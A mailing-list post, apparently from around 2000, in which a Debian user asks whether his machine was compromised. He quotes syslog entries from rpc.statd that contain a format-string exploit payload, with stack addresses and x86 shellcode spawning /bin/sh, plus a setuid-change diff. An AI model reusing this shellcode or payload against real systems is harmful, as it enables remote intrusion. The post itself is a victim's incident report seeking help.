Have I been hacked?
Hi,
Looking at the system logs for my Potato system (it was Slink, but I
apt-get upgraded), I see some unusual entries. From messages.0 :
Dec 31 05:29:18 marvin 173>Dec 31 05:29:18 /sbin/rpc.statd[300]:
gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff6ec
804a174400f0078687465676274736f6d616e797265206520726f7220726f66
bffff718
bffff719 bffff71a
bffff71b???????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
Dec 31 05:29:18 marvin ????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ??Î?Ã1É°?Í?þÁ°?Í?þÁ°?Í?Ç^F/binÇF^D/shA0À?F^G?v^L
V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
(excuse the stupid reformating that Bloatus Notes does - but I had to
use my work machine for this note since I know that it is secure)
Same kind of error in syslog.0 :
Dec 31 05:29:18 marvin syslogd: Cannot glue message parts together
Dec 31 05:29:18 marvin 173>Dec 31 05:29:18 /sbin/rpc.statd[300]:
gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff6ec
804a174400f0078687465676274736f6d616e797265206520726f7220726f66
bffff718
bffff719 bffff71a
bffff71b???????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
Dec 31 05:29:18 marvin ????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ??Î?Ã1É°?Í?þÁ°?Í?þÁ°?Í?Ç^F/binÇF^D/shA0À?F^G?v^L
V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
>From setuid.changes :
marvin changes to setuid programs and devices:
--- setuid.today Fri Dec 29 06:32:04 2000
+++ /var/log/setuid.new.tmp Sun Dec 31 06:32:01 2000
@@ -1,5 +1,4 @@
- 2 620 1 pgmr tty 0 Fri Dec 29 02:31:09
2000 /dev/pts/0
- 3 620 1 pgmr tty 0 Fri Dec 29 01:43:39
2000 /dev/pts/1
+ 2 620 1 pgmr tty 0 Sun Dec 31 05:29:18
2000 /dev/pts/0
4120 4755 2 root root 499916 Wed Mar 8 01:51:40
2000 /usr/bin/sperl5.00405
4120 4755 2 root root 499916 Wed Mar 8 01:51:40
2000 /usr/bin/suidperl-5.004
4122 4755 1 root staff 4787 Sat Jan 15 09:30:29
2000 /usr/local/bin/dflt_routes
I was logged on an had an xterm running from midnight 12/31 - but I
definitely wasnt doing anything at 5:30 in the morning.
Would this be due to a hack attempt? How can I tell if this was
successful. I shut down the system after I detected this and havent booted
it up since, but any suggestions on what to do once I bring it up again?
Thanks,
Kenneth
Reply to: